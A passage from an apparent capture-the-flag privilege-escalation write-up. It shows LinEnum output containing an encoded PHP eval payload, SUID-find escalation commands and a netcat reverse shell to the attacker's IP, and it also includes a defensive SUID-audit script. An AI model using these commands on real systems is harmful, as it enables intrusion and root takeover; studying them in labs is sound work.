Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m 1061 root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2 1062 root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3 1063 root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4 1064 root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5 1065 root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6 1066 root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0] 1067 root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 1068 root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd 1069 root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1 1070 www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1071 www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1072 www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start 1073 www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1074 www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1075 www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start 1076 www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(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.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));' 1077 www-data 3406 0.0 0.8 41132 9032 ? 
S 00:39 0:01 php -r eval(base64_decode(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.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)); 1078 www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh 1079 www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh 1080 root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1] 1081 root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2] 1082 www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1083 www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1084 www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a 1085 www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh 1086 www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux 1087 1088 1089 [00;31m[-] Process binaries and associated permissions (from above list):[00m 1090 -rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash 1091 lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash 1092 -rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty 1093 -rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd 1094 -rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind 1095 -rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon 1096 -rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid 1097 lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2 1098 -rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd 1099 -rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron 1100 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 1101 -rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld 1102 -rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd 1103 -rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd 1104 -rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd 1105 1106 1107 [00;31m[-] /etc/init.d/ binary permissions:[00m 1108 total 280 1109 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 1110 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 
1111 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot 1112 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start 1113 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop 1114 -rw-r--r-- 1 root root 2427 Oct 16 2012 README 1115 -rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid 1116 -rwxr-xr-x 1 root root 7820 May 26 2018 apache2 1117 -rwxr-xr-x 1 root root 1071 Jun 25 2011 atd 1118 -rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs 1119 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh 1120 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh 1121 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh 1122 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh 1123 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup 1124 -rwxr-xr-x 1 root root 3033 Jul 3 2012 cron 1125 -rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus 1126 -rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4 1127 -rwxr-xr-x 1 root root 1329 Oct 16 2012 halt 1128 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh 1129 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh 1130 -rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd 1131 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup 1132 -rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs 1133 -rwxr-xr-x 1 root root 1990 May 21 2012 kmod 1134 -rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans 1135 -rwxr-xr-x 1 root root 995 Oct 16 2012 motd 1136 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh 1137 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh 1138 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh 1139 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh 1140 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh 1141 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh 1142 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh 1143 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql 1144 -rwxr-xr-x 1 root root 4322 Mar 14 2013 networking 1145 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common 1146 -rwxr-xr-x 1 root root 1346 May 20 2012 procps 
1147 -rwxr-xr-x 1 root root 6120 Oct 16 2012 rc 1148 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local 1149 -rwxr-xr-x 1 root root 117 Oct 16 2012 rcS 1150 -rwxr-xr-x 1 root root 639 Oct 16 2012 reboot 1151 -rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond 1152 -rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin 1153 -rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind 1154 -rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog 1155 -rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs 1156 -rwxr-xr-x 1 root root 590 Oct 16 2012 single 1157 -rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton 1158 -rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh 1159 -rwxr-xr-x 1 root root 8827 Nov 9 2012 udev 1160 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab 1161 -rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs 1162 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh 1163 -rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot 1164 -rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom 1165 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils 1166 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common 1167 1168 1169 [00;31m[-] /etc/init/ config file permissions:[00m 1170 total 48 1171 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 1172 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 
1173 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf 1174 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf 1175 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf 1176 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf 1177 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf 1178 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf 1179 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf 1180 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf 1181 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf 1182 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf 1183 1184 1185 [00;31m[-] /lib/systemd/* config file permissions:[00m 1186 /lib/systemd/: 1187 total 4.0K 1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system 1189 1190 /lib/systemd/system: 1191 total 56K 1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants 1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants 1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants 1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants 1196 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service 1197 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket 1198 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service 1199 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket 1200 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket 1201 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service 1202 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service 1203 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service 1204 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service 1205 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket 1206 1207 /lib/systemd/system/dbus.target.wants: 1208 total 0 1209 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 1210 1211 /lib/systemd/system/multi-user.target.wants: 1212 total 0 1213 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service 
1214 1215 /lib/systemd/system/sockets.target.wants: 1216 total 0 1217 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket 1218 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket 1219 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket 1220 1221 /lib/systemd/system/basic.target.wants: 1222 total 0 1223 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service 1224 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service 1225 1226 1227 [00;33m### SOFTWARE #############################################[00m 1228 [00;31m[-] MYSQL version:[00m 1229 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 1230 1231 1232 [00;31m[-] Apache user configuration:[00m 1233 APACHE_RUN_USER=www-data 1234 APACHE_RUN_GROUP=www-data 1235 1236 1237 [00;33m### INTERESTING FILES ####################################[00m 1238 [00;31m[-] Useful file locations:[00m 1239 /bin/nc 1240 /bin/netcat 1241 /usr/bin/wget 1242 /usr/bin/gcc 1243 /usr/bin/curl 1244 1245 1246 [00;31m[-] Installed compilers:[00m 1247 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler 1248 ii gcc 4:4.7.2-1 i386 GNU C compiler 1249 ii gcc-4.7 4.7.2-5 i386 GNU C compiler 1250 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files) 1251 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) 1252 1253 1254 [00;31m[-] Can we read/write sensitive files:[00m 1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd 1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group 1257 -rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile 1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow 1259 1260 1261 [00;31m[-] SUID files:[00m 1262 -rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount 1263 -rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping 1264 -rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su 1265 -rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6 1266 -rwsr-xr-x 1 root root 
67704 Dec 10 2012 /bin/umount 1267 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 1268 -rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh 1269 -rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd 1270 -rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp 1271 -rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn 1272 -rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd 1273 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 1274 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 1275 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4 1276 -rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown 1277 -rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign 1278 -rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 1280 -rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs 1281 1282 1283 [00;33m[+] Possibly interesting SUID files:[00m 1284 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find 1285 1286 1287 [00;31m[-] SGID files:[00m 1288 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent 1289 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at 1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate 1291 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile 1292 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage 1293 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write 1294 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock 1295 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall 1296 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab 1297 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry 1298 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail 1299 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile 1300 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter 1301 -rwxr-sr-x 1 root shadow 
30332 May 5 2012 /sbin/unix_chkpwd 1302 1303 1304 [-] Can't search *.conf files as no keyword was entered 1305 1306 [-] Can't search *.php files as no keyword was entered 1307 1308 [-] Can't search *.log files as no keyword was entered 1309 1310 [-] Can't search *.ini files as no keyword was entered 1311 1312 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m 1313 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf 1314 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf 1315 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf 1316 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf 1317 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf 1318 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf 1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf 1320 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf 1321 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf 1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf 1323 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf 1324 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf 1325 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf 1326 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf 1327 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf 1328 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf 1329 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf 1330 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf 1331 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf 1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf 1333 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf 1334 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf 1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf 1336 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf 1337 1338 1339 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m 1340 
/home/flag4/.bash_history 1341 cd 1342 ls 1343 vi flag4.txt 1344 ls 1345 exit 1346 1347 1348 [00;31m[-] Any interesting mail in /var/mail:[00m 1349 total 8 1350 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 . 1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. 1352 1353 1354 [00;33m### SCAN COMPLETE ####################################[00m
The scan turned up a weak point (find is listed under "Possibly interesting SUID files"), so the next attempt is SUID privilege escalation.
Reference article: https://pentestlab.blog/2017/09/25/suid-executables/
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
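The same `-perm -4000` predicate used above for enumeration is what a defender runs to catch this class of misconfiguration before an attacker does. The script below is an added example, not code from the original write-up or from LinEnum: it compares the setuid binaries found on a host against a per-host baseline and reports anything that is not in it, which on this box would flag /usr/bin/find. The baseline and the sample listing are constructed for the example (the sample lines are copied from the LinEnum output shown in this write-up); the names SUID_BASELINE, in_baseline, audit_suid, audit_sample and collect_suid_live are chosen here.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit setuid binaries
# against a per-host baseline so an unexpected setuid-root binary such as
# /usr/bin/find stands out instead of hiding among the stock ones.

# Baseline of paths that are legitimately setuid on this host. Constructed
# for the example from the stock Debian 7 entries in the LinEnum output; a
# real deployment would generate it from a known-good image and keep it in
# version control.
SUID_BASELINE="/bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount
/usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn
/usr/bin/gpasswd /usr/bin/procmail /usr/sbin/exim4 /usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs"

# Sample listing, constructed from the LinEnum SUID section in the write-up.
SAMPLE_LISTING='-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4'

# Return 0 if $1 is one of the baseline paths, 1 otherwise.
in_baseline() {
    for known in $SUID_BASELINE; do
        [ "$known" = "$1" ] && return 0
    done
    return 1
}

# Read a SUID listing on stdin (bare paths or `ls -l` style lines, where the
# path is the last field) and print each path that is not in the baseline.
# Returns 1 if anything unexpected was seen, 0 otherwise, so it can drive a
# cron alert.
audit_suid() {
    unexpected=0
    while IFS= read -r line; do
        path=${line##* }                 # last whitespace-separated field
        [ -n "$path" ] || continue
        if ! in_baseline "$path"; then
            printf '%s\n' "$path"
            unexpected=1
        fi
    done
    return $unexpected
}

# Enumerate setuid files on the live host: same predicate as the write-up's
# find command, restricted to the root filesystem.
collect_suid_live() {
    find / -xdev -type f -perm -4000 -print 2>/dev/null
}

# Audit the constructed sample listing (expected to flag /usr/bin/find).
audit_sample() {
    printf '%s\n' "$SAMPLE_LISTING" | audit_suid
}

# Usage: ./suid_audit.sh          audit the constructed sample listing
#        ./suid_audit.sh --live   audit this host with find(1)
if [ "${1:-}" = "--live" ]; then
    collect_suid_live | audit_suid && echo "no unexpected SUID binaries"
else
    audit_sample || echo "^ unexpected SUID binaries (not in baseline)"
fi
```

The baseline should be regenerated whenever a package that legitimately installs a setuid helper is added; the point of the check is that a setuid bit on a general-purpose tool like find, which can execute arbitrary commands via -exec, never belongs in it.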
Reverse shell
Attacker machine:
root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...
In the meterpreter shell, run: find suidtest -exec netcat -e /bin/sh 192.168.0.117 8999 \;
Privilege escalation succeeded.